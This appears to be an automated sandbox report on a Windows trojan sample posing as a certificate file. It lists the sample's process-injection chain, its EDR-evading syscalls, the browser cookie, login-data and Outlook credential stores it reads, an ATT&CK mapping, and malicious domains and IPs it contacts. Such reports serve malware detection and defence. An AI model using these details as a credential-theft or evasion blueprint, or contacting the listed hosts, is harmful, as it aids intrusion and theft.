            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 4624
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 27C8008
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0087B106 LogonUserW
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00843D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0088411C SendInput,keybd_event
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008874BB mouse_event
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0087A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: Certificate 1045-20-11.exe, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166622080.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: Certificate 1045-20-11.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166622080.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166622080.0000000000CE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008665C4 cpuid
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0089091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_008BB340 GetUserNameW
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00871E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0085DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Certificate 1045-20-11.exe | Binary or memory string: WIN_81
            Source: Certificate 1045-20-11.exe | Binary or memory string: WIN_XP
            Source: Certificate 1045-20-11.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: Certificate 1045-20-11.exe | Binary or memory string: WIN_XPe
            Source: Certificate 1045-20-11.exe | Binary or memory string: WIN_VISTA
            Source: Certificate 1045-20-11.exe | Binary or memory string: WIN_7
            Source: Certificate 1045-20-11.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_00898C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exe | Code function: 0_2_0089923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket

            Mitre Att&ck Matrix

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1560129 | Sample: Certificate 1045-20-11.exe | Startdate: 21/11/2024 | Architecture: WINDOWS | Score: 100
            Start -> DNS/IP: www.joyesi.xyz, www.shenzhoucui.com, 17 other IPs or domains (Performs DNS queries to domains with low reputation); signatures: Suricata IDS alerts for network traffic, Malicious sample detected (through community Yara rule), Antivirus detection for URL or domain, 6 other signatures
            Start -> Certificate 1045-20-11.exe (started); signatures: Binary is likely a compiled AutoIt script file, Writes to foreign memory regions, Maps a DLL or memory area into another process
            Certificate 1045-20-11.exe -> svchost.exe (started); signatures: Maps a DLL or memory area into another process
            svchost.exe -> FGcoivYXQsEMNANuoDkk.exe (injected); signatures: Found direct / indirect Syscall (likely to bypass EDR)
            FGcoivYXQsEMNANuoDkk.exe -> netbtugc.exe (started); signatures: Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc), Modifies the context of a thread in another process (thread injection), 3 other signatures
            netbtugc.exe -> FGcoivYXQsEMNANuoDkk.exe (injected); netbtugc.exe -> firefox.exe (started)
            FGcoivYXQsEMNANuoDkk.exe (injected) -> DNS/IP: elettrosistemista.zip 195.110.124.133, 50019, 50020, 50021 REGISTER-ASIT Italy; empowermedeco.com 217.196.55.202, 50023, 50024, 50025 AS-DIRECTCONNECTNO Norway; 5 other IPs or domains; signatures: Found direct / indirect Syscall (likely to bypass EDR)

            Source | Detection | Scanner | Label
            Certificate 1045-20-11.exe | 29% | ReversingLabs | Win32.Trojan.AutoitInject
            Certificate 1045-20-11.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
                                                unknown
                                                http://www.techchains.info/fo8o/false
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://duckduckgo.com/ac/?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.empowermedeco.com/fo8o/?SHqP-p=mxnRnetbtugc.exe, 00000003.00000002.4168533677.0000000004E3A000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003BCA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.empowermedeco.comFGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4168934011.0000000004B2D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000003.00000002.4168533677.00000000044CE000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4170196597.0000000006210000.00000004.00000800.00020000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.sedo.com/services/parking.php3FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.000000000325E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000003.00000002.4168533677.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000003.00000002.4168533677.00000000047F2000.00000004.10000000.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4167257692.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000003.00000003.2061534883.0000000007ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              91.195.240.94
                                                                              www.rssnewscast.comGermany
                                                                              47846SEDO-ASDEfalse
                                                                              154.215.72.110
                                                                              www.3xfootball.comSeychelles
                                                                              132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                              195.110.124.133
                                                                              elettrosistemista.zipItaly
                                                                              39729REGISTER-ASITtrue
                                                                              116.50.37.244
                                                                              www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                              18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                              85.159.66.93
                                                                              natroredirect.natrocdn.comTurkey
                                                                              34619CIZGITRfalse
                                                                              66.29.149.46
                                                                              www.techchains.infoUnited States
                                                                              19538ADVANTAGECOMUSfalse
                                                                              217.196.55.202
                                                                              empowermedeco.comNorway
                                                                              29300AS-DIRECTCONNECTNOtrue
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1560129
Start date and time: 2024-11-21 12:52:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Certificate 1045-20-11.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@16/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 54
• Number of non-executed functions: 291
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Certificate 1045-20-11.exe
Time: 06:53:51
Type: API Interceptor
Description: 10535894x Sleep call for process: netbtugc.exe modified
Process: C:\Windows\SysWOW64\netbtugc.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Certificate 1045-20-11.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.994107944055315
Encrypted: true
SSDEEP: 6144:QuMYjkPUhHrXSKfOuOI1MkSERmvApxe0NNOoTZ/49F2zub:fM6pbSKWNIUlYp3XOk/49F2Kb
MD5: 2C1AE20B3CF7D697105651BB6521B2C7
SHA1: D1F4CA4515FB14685BF1470A58DD326F4EDDE8C1
SHA-256: FC8853F20677FE8DED4F79E160E5831730703C967E1811B9C87BD9D5677DCE20
SHA-512: C0A88760349A7E9C204EAD6B536886898FA1149D45DE8DC8A142D48257F26ACC48AB34BA1F7B6B00D02BBCAB3215A1B61484DCB7B50C527D33966ED769A5C932
Malicious: false
Reputation: low
                                                                              Preview:..t..F270...H......ZT....K1..8BWC1ZWF270H95AP8BWC1ZWF270H95.P8BY\.TW.;...8y.ql*>0.*%)UEQ%.V >V-#cS?w4GY.!W...kb:,U?yK?=.H95AP8B.B8.j&U..(^.|0_.M.m&U.*..}0_.M.k&U.b!Z]|0_.WC1ZWF27`.95.Q9B.+..WF270H95.P:C\B:ZWV670H95AP8B.V1ZWV270h=5APxBWS1ZWD276H95AP8BQC1ZWF270h=5AR8BWC1ZUFr.0H)5A@8BWC!ZWV270H95QP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8By7T"#F27.G=5A@8BWS5ZWV270H95AP8BWC1ZwF2W0H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF270H95AP8BWC1ZWF27
Process: C:\Users\user\Desktop\Certificate 1045-20-11.exe
File Type: data
Category: dropped
Size (bytes): 270848
Entropy (8bit): 7.994107944055315
Encrypted: true
SSDEEP: 6144:QuMYjkPUhHrXSKfOuOI1MkSERmvApxe0NNOoTZ/49F2zub:fM6pbSKWNIUlYp3XOk/49F2Kb
MD5: 2C1AE20B3CF7D697105651BB6521B2C7
SHA1: D1F4CA4515FB14685BF1470A58DD326F4EDDE8C1
SHA-256: FC8853F20677FE8DED4F79E160E5831730703C967E1811B9C87BD9D5677DCE20
